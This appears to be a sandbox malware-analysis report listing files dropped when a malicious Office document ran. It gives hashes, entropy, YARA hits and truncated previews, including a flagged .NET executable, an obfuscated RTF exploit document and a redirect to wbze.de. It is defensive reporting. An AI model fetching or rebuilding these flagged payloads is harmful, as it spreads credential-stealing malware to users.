	attachment.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.13.205 172.67.74.152
	NI-45733-D.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.13.205 172.67.74.152
	Payment Swift.doc	Get hash	malicious	AgentTesla	Browse	104.26.13.205 172.67.74.152
	gmb.xls	Get hash	malicious	Unknown	Browse	104.26.13.205 172.67.74.152
	scripttodo.ps1	Get hash	malicious	Unknown	Browse	104.26.13.205 172.67.74.152

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	292
Entropy (8bit):	5.20899175446721
Encrypted:	false
SSDEEP:	6:DiSkVOq2PP2nKuAl9OmbnIFUt86i5Zmw+6iTkwOP2nKuAl9OmbjLJ:DiHOvWHAahFUt86i5/+6iT57HAaSJ
MD5:	62311E39410AC0DF0EDA87197F494FDF
SHA1:	286E52E2D731030DE742FE801AAF5767C2A16EA2
SHA-256:	B627F3656787CC9467F29E540656B24469E03CCC78073B63E5DFF116911FF822
SHA-512:	806E32CDB5F43AD58906C9A85610EB1A422A74A0E87D9AB505B6E678EEC8A90EE2B5C3163F59641702E8118EBB6555C40650204DD01DAFC5E50511240C055442
Malicious:	false
Reputation:	low
Preview:	2024/05/06-14:59:48.602 3900 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/06-14:59:48.604 3900 Recovering log #3.2024/05/06-14:59:48.604 3900 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.20899175446721
Encrypted:	false
SSDEEP:	6:DiSkVOq2PP2nKuAl9OmbnIFUt86i5Zmw+6iTkwOP2nKuAl9OmbjLJ:DiHOvWHAahFUt86i5/+6iT57HAaSJ
MD5:	62311E39410AC0DF0EDA87197F494FDF
SHA1:	286E52E2D731030DE742FE801AAF5767C2A16EA2
SHA-256:	B627F3656787CC9467F29E540656B24469E03CCC78073B63E5DFF116911FF822
SHA-512:	806E32CDB5F43AD58906C9A85610EB1A422A74A0E87D9AB505B6E678EEC8A90EE2B5C3163F59641702E8118EBB6555C40650204DD01DAFC5E50511240C055442
Malicious:	false
Reputation:	low
Preview:	2024/05/06-14:59:48.602 3900 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/06-14:59:48.604 3900 Recovering log #3.2024/05/06-14:59:48.604 3900 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF6a5c44.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.20899175446721
Encrypted:	false
SSDEEP:	6:DiSkVOq2PP2nKuAl9OmbnIFUt86i5Zmw+6iTkwOP2nKuAl9OmbjLJ:DiHOvWHAahFUt86i5/+6iT57HAaSJ
MD5:	62311E39410AC0DF0EDA87197F494FDF
SHA1:	286E52E2D731030DE742FE801AAF5767C2A16EA2
SHA-256:	B627F3656787CC9467F29E540656B24469E03CCC78073B63E5DFF116911FF822
SHA-512:	806E32CDB5F43AD58906C9A85610EB1A422A74A0E87D9AB505B6E678EEC8A90EE2B5C3163F59641702E8118EBB6555C40650204DD01DAFC5E50511240C055442
Malicious:	false
Reputation:	low
Preview:	2024/05/06-14:59:48.602 3900 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/06-14:59:48.604 3900 Recovering log #3.2024/05/06-14:59:48.604 3900 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.008898238653846898
Encrypted:	false
SSDEEP:	3:ImtVnM1xVlt/rt/l3Sxdlt4dV1gt/lop:IiV0xlzaxdX4m1lo
MD5:	3B8BF2F369CA7ABDF0636EE15DDEF161
SHA1:	4B82D483B79B555C62AA17F31F24F43C38F2C80F
SHA-256:	100201408FDCFA835C8699C6C2FCE748C5C3844C386053F9AA7CAD622373BFCA
SHA-512:	457D92EA15FA528E7BE3ED8136A267BD08A4D7866FDD7C353CFEB898F896983B40BB48156DC25D5E00EC118C6309337F3A9344226D1635F94D7F4A122D3DD87E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3024000, file counter 15, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	3.5766603441870006
Encrypted:	false
SSDEEP:	384:neh9dThStELJ8DAcLKuZsLRGlKhsvXh+vSc:fAeZsLQhUSc
MD5:	721C18B3CD785E0C4FB66A26E87DA34C
SHA1:	654A0452D249353639B0DDF1A8DD0DE0726EAB86
SHA-256:	61838AD15EA90607EAA10B778A10F558BF1E6632B6AED9272973FF6D1AA59417
SHA-512:	85594C31617CA42DE77FE048FDB34F0B5AF37E0671989D0D513B315886F518BC86604EAD08F9262F7FBA80D9F31433CD51FC7142795C33DF2D2F0C2F7E6A5DB7
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.315571834030992
Encrypted:	false
SSDEEP:	48:7Mk2iomVmBsmom1COiomwom1Nom1Aiom1RROiom1Com1pom1tiomVPiomgy1qAle:7CCm6rOOhZCPYd49IVXEBodRBkH
MD5:	D1E64C7A3430F2CE9F30E0AA21C98228
SHA1:	6C0F8235D4D91E19F14B20D468774EEAFBCD6D75
SHA-256:	D428BFB22D94211FE8241B0624A6A0EAA759FD98D74A62A58C20949FE58CE831
SHA-512:	FED84778BEE6678725677A1B4727A2B46F5FA1EE5551B4E03AD008ACB1A8C35129737B01ABB300AD820AB5C5F1DCA548A4E8F6BC4F3015783AA10D1DCD58F960
Malicious:	false
Reputation:	low
Preview:	.... .c........x..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W....X.W.L...y.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	72643
Entropy (8bit):	5.393779678652009
Encrypted:	false
SSDEEP:	768:PCbTjMYOpdyVFWqnPvBRSiRkTIVzY3OX7pWHDyx2UNYyu:AlOpdyVFWcPvBBRkTIdY3mayJK
MD5:	7D19F935942004A2E6AF01218B33B7D7
SHA1:	FC3C42C8CD80A3561FA7595987904489D56D5C22
SHA-256:	1DB417BF2B690ED20C72CBD8B9BF1B253F4500A77C3ED7DFB5EB5AB2922FE2BF
SHA-512:	D344E9566A83CD79B53B769018242833807CA28B92C8996623E54ABD7A780599A51382DB271A2F6E51CB115080E5A02D4967E083DD8E2C693D3CB7C6D5D19491
Malicious:	false
Preview:	4.458.88.FID.2:o:........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.94.FID.2:o:........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.82.FID.2:o:........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.85.FID.2:o:........:F:Aparajita.P:Aparajita.L:&.........................."F:Aparajita.#.99.FID.2:o:........:F:Aparajita-Italic.P:Aparajita Italic.L:&.........................."F:Aparajita.#.95.FID.2:o:........:F:Aparajita-Bold.P:Aparajita Bold.L:&.........................."F:Aparajita.#.108.FID.2:o:........:F:Aparajita-BoldItalic.P:Aparajita Bold Italic.L:&.........................."F:Aparajita.#.93.FID.2:o:........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.75.FID.2:o:........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.89.FID.2:o:........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.85.FID.2:o:........:F:Arial-BoldMT.P:Arial Bold.L:$....

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02566577083543993
Encrypted:	false
SSDEEP:	6:I3DPc7vI/vxggLRn2R8F2stGv5FRXv//4tfnRujlw//+GtluJ/eRuj:I3DP0mLaTM0vYg3J/
MD5:	FAB8881474C3EE52D22C122C0D4DD313
SHA1:	4DFB830381D6569AB6F190108962F67DC2BABDD1
SHA-256:	207017226D5EAD94C4E64E1BC6B8259C7C12D9BC6ED5516FCA4170E4BBB63D6A
SHA-512:	16A083B3A0210BB8DF6C1E7C327B8E0EEA057B3C938F7AA7C48EE30ACD99929F841CD38DDB0604F61572C751ED6C63F110B826517D112D0FE1505294E7F03A9F
Malicious:	false
Preview:	......M.eFy...z.......G.._.48(.S,...X.F...Fa.q............................p.0.<..@..@.E.h...........>...{H....}f.J.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	753152
Entropy (8bit):	7.820038309246593
Encrypted:	false
SSDEEP:	12288:nYiAEfD23qCSipEKYiE0JCv9XX8qKEcfldi8+LxfIqpW87PKYUsT4e9LIu:YRE72aCShZwJ6ONdi8IfI0zUscc
MD5:	4C8B56B125AE41293AA6028204D44268
SHA1:	21482DB39F9240559957F1FCCC61017D6845407E
SHA-256:	1809301D773302B15457BFA5830B9EEBFBEC989867DB46E9A06882AF386DF130
SHA-512:	BF2D7F663BB2B2FC4AF36524839EE243836B7AB3692861D30F74EE11EB10A4FB05E7E3879EC196750EBF8B05C5284F559C7BC41331D74E105E208101F019A76E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 37%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..j............... ........@.. ....................................@.................................Y...O....................................h..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............\|..............@..B........................H........X...F......D.......X............................................0..i........r...p}.....r...p}.....(........}......=(...+..,...(......+,..>(...+..,...(......+...<(...+..,...(......*....0.. .........{......O...%..=.o........o....... (...+..9........O...%.. .o........o...........O...%....o...........(......~......o .......,n.~......o!.....~......o"....Q...............,=....+&......o....sO........oQ...}........X.......i.Y......-...+...r...p}............r;..p}........+...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\u7xc[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	301
Entropy (8bit):	5.200930960818896
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPJ1uRKRDFLMU3dywcXaoD:J0+ox0RJWWPpxtNywma+
MD5:	6312E969C0BC711D0E219BC5443CEEDD
SHA1:	9B0617299EA11186BAD6ADC93DFC2E466398D867
SHA-256:	C78DF17F325FEAE84778A9DC3BAA8817D1D5184965F7D10C1E47E7EE2ADC3CDE
SHA-512:	F4C664837B5876F71E984DAFD4ECC9A1A11949B9F50DB8391488F8A3AB477A7CEA7C01527A85A15C8ABA514CE5AEEF718F29DB67257D761CA50D3A388FEA0ED5
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://wbze.de/u7xc">here</a>.</p>.<hr>.<address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	79896
Entropy (8bit):	2.796185182406134
Encrypted:	false
SSDEEP:	1536:xmgkvPbKPLhanYgHlYRkegexNd7lRQ3RCLl1vHSO2UVqQHAHAU:xmgkvP5Y4l4gexNdDQADHS3UoxAU
MD5:	554006B43D2303718CA320BE50657C82
SHA1:	806974CC7E3B723922012693F477BBEF925DFFED
SHA-256:	08A5FB6838C3C5A8D96DE60DDD54076366C8016FE16C00E741A76B00662DA1B1
SHA-512:	BDEBF328014BA95BBC9D9DCD7535718D4DDD1ED9973AEDB062F36B0538F7CF35B756082978AA70EB5FF8DEC75824031C7AEC40B5096D70C712AFE4A1CDEFA34E
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rtf1.............{\\wzName541791315 \[}.{\43897386./0.,>$[83!?0')-\|@?^@^?+([;887``\|4!2!?.?#\|.1?~0~(_%)[!%'=7\|??~>%??6.38\|].5=$?/?<,4-&^?10<%?1??+-6\|<.^;2=2=9.@%+;%_\|?9-46^%/].<[%5_^$1.'@,,).$!.356~..?98(2$?'=_?>(5^?.]<22138?_6.+`4@/7\|=?/(?!4?.^/.?.-,4.'..:^<^\|96[#76~,0~`.?%4)[%_?&&50^#5.921%/%\|'_0,>6.2%`3='77>9<>^8'$!&:8';4.0[$~.;413.9>'.,'^5`)`1.:0?.)?<,.^3%.>$9~3.4.[%:649=?$``^_]%].)@%..4?&`\|][[?.;2/-@@<2&4?.,,?^=017?_'.<?^?3?(\|)-?9..-0(]?%`;-0531;.$90)1~-#+.\|?.+?=..$.2`%^.>?&/>>7[87?)2:3%5,<?#4!->8-.^_..__]_.3-;]+<1/,?@8?+0@%5\|.0.:@.4[][?80$&]?&.?..[~4&>(]<5-'_?+.4\|#@2~>><<++@(<9#\|/9'>%'[@.7>$[._#('~6<&.%(+7=1!.?3.9,?..)=_?;<4.<`[,.75_[->.>@#89)+>&%?.;33\|(=:??0-5^,?0%\|!4_7_6$.:%??..7437__;86\|?+5?,,^>(~;\|.-6&=1~?3~9;?.?.($\|1+,?3%3?)?[2%??6?77?;#,?>-6?3849?5!9@7?7^3?76357-'=??-([-\|/(6\|?7;7(._?;1:.?)<%'`8??./@`0?/6)%?=.,6>?1<~?6(]'\|1_\|'<.;~9[97@?,.~2>\|)=%37)?`8;(??,?.9(#`%/81?#^^88?.?]`^53?[^,\|.\|.^_222^?<?^,?1\|\|=].?%^<>.-?]+%:.@'5.+;;>/`#8?%>]:(%?~]>.%^==>0_8,4???>?6\|/<

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B42AF54.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.608714479340621
Encrypted:	false
SSDEEP:	768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
MD5:	476C7C2F309C957F6428D04E94C4F64A
SHA1:	F1B0FA252BABFB7002DC87069A436AD71BDA532F
SHA-256:	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
SHA-512:	C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4648E7E0.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.608714479340621
Encrypted:	false
SSDEEP:	768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
MD5:	476C7C2F309C957F6428D04E94C4F64A
SHA1:	F1B0FA252BABFB7002DC87069A436AD71BDA532F
SHA-256:	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
SHA-512:	C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	79896
Entropy (8bit):	2.796185182406134
Encrypted:	false
SSDEEP:	1536:xmgkvPbKPLhanYgHlYRkegexNd7lRQ3RCLl1vHSO2UVqQHAHAU:xmgkvP5Y4l4gexNdDQADHS3UoxAU
MD5:	554006B43D2303718CA320BE50657C82
SHA1:	806974CC7E3B723922012693F477BBEF925DFFED
SHA-256:	08A5FB6838C3C5A8D96DE60DDD54076366C8016FE16C00E741A76B00662DA1B1
SHA-512:	BDEBF328014BA95BBC9D9DCD7535718D4DDD1ED9973AEDB062F36B0538F7CF35B756082978AA70EB5FF8DEC75824031C7AEC40B5096D70C712AFE4A1CDEFA34E
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rtf1.............{\\wzName541791315 \[}.{\43897386./0.,>$[83!?0')-\|@?^@^?+([;887``\|4!2!?.?#\|.1?~0~(_%)[!%'=7\|??~>%??6.38\|].5=$?/?<,4-&^?10<%?1??+-6\|<.^;2=2=9.@%+;%_\|?9-46^%/].<[%5_^$1.'@,,).$!.356~..?98(2$?'=_?>(5^?.]<22138?_6.+`4@/7\|=?/(?!4?.^/.?.-,4.'..:^<^\|96[#76~,0~`.?%4)[%_?&&50^#5.921%/%\|'_0,>6.2%`3='77>9<>^8'$!&:8';4.0[$~.;413.9>'.,'^5`)`1.:0?.)?<,.^3%.>$9~3.4.[%:649=?$``^_]%].)@%..4?&`\|][[?.;2/-@@<2&4?.,,?^=017?_'.<?^?3?(\|)-?9..-0(]?%`;-0531;.$90)1~-#+.\|?.+?=..$.2`%^.>?&/>>7[87?)2:3%5,<?#4!->8-.^_..__]_.3-;]+<1/,?@8?+0@%5\|.0.:@.4[][?80$&]?&.?..[~4&>(]<5-'_?+.4\|#@2~>><<++@(<9#\|/9'>%'[@.7>$[._#('~6<&.%(+7=1!.?3.9,?..)=_?;<4.<`[,.75_[->.>@#89)+>&%?.;33\|(=:??0-5^,?0%\|!4_7_6$.:%??..7437__;86\|?+5?,,^>(~;\|.-6&=1~?3~9;?.?.($\|1+,?3%3?)?[2%??6?77?;#,?>-6?3849?5!9@7?7^3?76357-'=??-([-\|/(6\|?7;7(._?;1:.?)<%'`8??./@`0?/6)%?=.,6>?1<~?6(]'\|1_\|'<.;~9[97@?,.~2>\|)=%37)?`8;(??,?.9(#`%/81?#^^88?.?]`^53?[^,\|.\|.^_222^?<?^,?1\|\|=].?%^<>.-?]+%:.@'5.+;;>/`#8?%>]:(%?~]>.%^==>0_8,4???>?6\|/<

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AEF169B.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.611760173242012
Encrypted:	false
SSDEEP:	768:/jKn4RpbfoTGRFm2GWWDEXM4espe2B/nwyFwx+VjRQ9+c4AgD7PHj8bKYEqQtVxY:/jhRpbfoaRFvGWW6/4DADMXIok/2GiEs
MD5:	D69C22A341E111FEEA69DF6D8C655D60
SHA1:	AC862337F2EFA43627508927F5052CE694012206
SHA-256:	05B2053BF1D070D6034B45CD79B54D80DA3C6D88D016671A345E75048B1A68DB
SHA-512:	D4DB33ED046B3C9BA09C4B3FEAC17B1FE2E75FCE67F4154FD795D504708C295A1E3C8331ED3D6C3EE9950C936C4CC25B5D690558C26F2E1F7771BD5EB275822C
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C815482.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.608714479340621
Encrypted:	false
SSDEEP:	768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
MD5:	476C7C2F309C957F6428D04E94C4F64A
SHA1:	F1B0FA252BABFB7002DC87069A436AD71BDA532F
SHA-256:	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
SHA-512:	C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3725F45.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.608714479340621
Encrypted:	false
SSDEEP:	768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
MD5:	476C7C2F309C957F6428D04E94C4F64A
SHA1:	F1B0FA252BABFB7002DC87069A436AD71BDA532F
SHA-256:	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
SHA-512:	C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBDDB4D6.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.608714479340621
Encrypted:	false
SSDEEP:	768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
MD5:	476C7C2F309C957F6428D04E94C4F64A
SHA1:	F1B0FA252BABFB7002DC87069A436AD71BDA532F
SHA-256:	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
SHA-512:	C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F93572DF.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.608714479340621
Encrypted:	false
SSDEEP:	768:QncRpbfoTGRFJxqWKAEXM4espeEnwyFwx+VjJ6bGx4Al7PHj8bKYEqQtVxGW6sQR:fRpbfoaRFTqWKP8w9MXIoZfE3NkEs
MD5:	476C7C2F309C957F6428D04E94C4F64A
SHA1:	F1B0FA252BABFB7002DC87069A436AD71BDA532F
SHA-256:	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
SHA-512:	C941FBACC6C98B556EA742538B2F2C61A66BE677AA5F97457DFE07EA9652E17FE545AC05740F8ED20B1449FDCF38E97C49FE73FF8D53220A4E8D3E6E3615854E
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	9551872
Entropy (8bit):	1.2121360229950167
Encrypted:	false
SSDEEP:	12288:W0+zdju+zJ+zYje+zc+zfjX8VK+z2/M+zG+zK/s+zK+zY/O8Vu+zojs8jKvEVMwS:wzdzcz8zRzotzsz3z4zTzqFzoBH
MD5:	05B2D6C1492004BFA223564604D9F32A
SHA1:	1EBE91D063F36A8B5CEF33650A1A09BF5B5BFCE8
SHA-256:	880A489BB41101557FDE655ED846B40E54A075FEE3ACFD182403175F3C8F300A
SHA-512:	9386B456690F77D7EE7A740B8F8C21330B4866F574A0A20306048DC31CBBBB702828D514C546EB932B239FE1845A43D9A84327F499C81CB309237B296C65714B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
